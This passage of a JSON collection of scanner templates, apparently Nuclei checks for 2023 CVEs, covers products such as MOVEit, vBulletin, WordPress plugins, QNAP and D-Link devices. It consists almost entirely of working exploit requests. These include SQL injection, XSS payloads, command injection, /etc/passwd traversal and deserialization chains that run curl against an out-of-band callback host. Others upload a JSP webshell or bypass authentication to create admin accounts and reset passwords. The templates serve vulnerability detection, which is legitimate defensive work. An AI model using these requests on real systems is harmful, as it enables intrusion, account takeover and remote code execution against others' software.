0.13.0 Beta 3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Camera named <img src=\\\"\\\" onerror=alert(document.domain)>\")","contains(header, \"text/html\")","status_code == 404"],"condition":"and"}]}]},{"id":"CVE-2023-34755","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&action=edit HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4973","info":{"name":"Academy LMS 6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_tution_class_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_duration%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"List of tuitions\")"],"condition":"and"}]}]},{"id":"CVE-2023-6329","info":{"name":"Control iD iDSecure - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/login/unlockGetData HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["serial"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"serial","internal":true,"json":[".serial"]}]},{"raw":["POST /api/login/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"passwordCustom\": \"{{javascript_response}}\", \"passwordRandom\": \"{{passwordRandom}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["accessToken"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"access-token","internal":true,"json":[".accessToken"]}]},{"raw":["POST /api/operator/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{access-token}}\nContent-Type: application/json\n\n{\"idType\": \"1\", \"name\": \"{{username}}\", \"user\": \"{{username}}\", \"newPassword\": \"{{password}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/json\")","contains_all(body, \"code\", \"newID\")"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-43374","info":{"name":"Hoteldruid v3.0.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /hoteldruid/inizio.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["HotelDruid</a>"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /hoteldruid/personalizza.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"HotelDruid:\")"],"condition":"and"}]}]},{"id":"CVE-2023-37679","info":{"name":"NextGen Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <dynamic-proxy>\n        <interface>java.lang.Comparable</interface>\n        <handler class=\"java.beans.EventHandler\">\n            <target class=\"java.lang.ProcessBuilder\">\n                <command>\n                    <string>curl</string>\n                    <string>http://{{interactsh-url}}/</string>\n                </command>\n            </target>\n            <action>start</action>\n        </handler>\n    </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-4714","info":{"name":"PlayTube 3.0.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["razorpay_options","PlayTube","key:"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","regex":["key: \"([a-z_A-Z0-9]+)\""]}]}]},{"id":"CVE-2023-4542","info":{"name":"D-Link DAR-8000-10 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /app/sys1.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6831","info":{"name":"mlflow - Path Traversal","severity":"high"},"requests":[{"raw":["PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{randstr}}\n","DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["Content-Type: application/json","Server: gunicorn"],"condition":"and"},{"type":"word","part":"body_2","words":["{}"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-50290","info":{"name":"Apache Solr - Host Environment Variables Leak via Metrics API","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/admin/metrics"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"responseHeader\":","\"solr.jetty\":","system.env"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43326","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-36347","info":{"name":"POS Codekop v2.0 - Broken Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/excel.php","{{BaseURL}}/pos-kasir-php/excel.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Document"]},{"type":"word","part":"header","words":["application/vnd.ms-excel"]}]}]},{"id":"CVE-2023-30625","info":{"name":"Rudder Server < 1.3.0-rc.1  - SQL Injection","severity":"high"},"requests":[{"raw":["POST /v1/warehouse/pending-events HTTP/1.1\nHost: {{Hostname}}\n\n{\"source_id\": \"test'; copy (SELECT '') to program '{{cmd}}'-- - \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["error getting pending"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-47218","info":{"name":"QNAP QTS and QuTS Hero  - OS Command Injection","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=\"avssqwfz\"\n\n--avssqwfz\nContent-Disposition: form-data; xxpcscma=\"field2\"; zczqildp=\"{{cmd}}\"\nContent-Type: text/plain\n\nskfqduny\n--avssqwfz\u2013\n","POST /cgi-bin/quick/{{file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1, \"code\\\": 200\", \"full_path_filename success\")","contains_all(body_2, \"uid=\", \"gid=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6553","info":{"name":"Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"Backup Migration\")"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"],"headers":{"Content-Dir":"{{rand_text_alpha(10)}}"},"matchers":[{"type":"dsl","dsl":["len(body) == 0","status_code == 200","!contains(body, \"Incorrect parameters\")"],"condition":"and"}]}]},{"id":"CVE-2023-31446","info":{"name":"Cassia Gateway Firmware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","regex":["^OK$"]}]}]},{"id":"CVE-2023-6634","info":{"name":"LearnPress < 4.2.5.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"{{randstr}}\" HTTP/1.1\nHost: {{Hostname}}\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args=\"O%3a13%3a\\u0022WP_HTML_Token\\u0022%3a2%3a{s%3a13%3a\\u0022bookmark_name\\u0022%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3bs%3a10%3a\\u0022on_destroy\\u0022%3bs%3a6%3a\\u0022system\\u0022%3b}\" HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\":\"LP_Helper\",\"method\":\"maybe_unserialize\"}&args=\"O%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bO%3a13%3a\\u0022WP_Block_List\\u0022%3a2%3a{s%3a6%3a\\u0022blocks\\u0022%3ba%3a1%3a{s%3a4%3a\\u0022Name\\u0022%3ba%3a1%3a{s%3a9%3a\\u0022blockName\\u0022%3bs%3a12%3a\\u0022Parent+Theme\\u0022%3b}}s%3a8%3a\\u0022registry\\u0022%3bO%3a22%3a\\u0022WP_Block_Type_Registry\\u0022%3a1%3a{s%3a22%3a\\u0022registered_block_types\\u0022%3bO%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bN%3bs%3a6%3a\\u0022parent\\u0022%3bO%3a22%3a\\u0022WpOrg\\\\Requests\\\\Session\\u0022%3a3%3a{s%3a3%3a\\u0022url\\u0022%3bs%3a10%3a\\u0022http%3a//p%3a0\\u0022%3bs%3a7%3a\\u0022headers\\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3b}s%3a7%3a\\u0022options\\u0022%3ba%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a23%3a\\u0022requests.before_request\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a15%3a\\u0022http%3a//p%3a0/Name\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\\u0022system\\u0022%3b}}}}i%3a1%3bs%3a8%3a\\u0022dispatch\\u0022%3b}}}}}}}}}}s%3a6%3a\\u0022parent\\u0022%3bN%3b}\" HTTP/1.1\nHost: {{Hostname}}\n\n"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_any(interactsh_protocol, 'http', 'dns')","contains(body, 'Error: data content invalid!')","contains(body_1, '<pre>{{randstr}}</pre>') ","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-36306","info":{"name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"><script>alert(document.domain)</script>\") && contains(body, \"Adiscon LogAnalyzer\")"],"condition":"and"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37474","info":{"name":"Copyparty <= 1.8.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress_username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress_username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress_username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ wordpress_username + \" WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-39109","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39108","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-32077","info":{"name":"Netmaker - Hardcoded DNS Secret Key","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/dns"],"headers":{"Authorization":"x secretkey"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/json\")","contains_all(body, \"{\\\"address\\\":\", \"\\\"network\\\":\", \"\\\"name\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-4450","info":{"name":"JeecgBoot JimuReport - Template injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 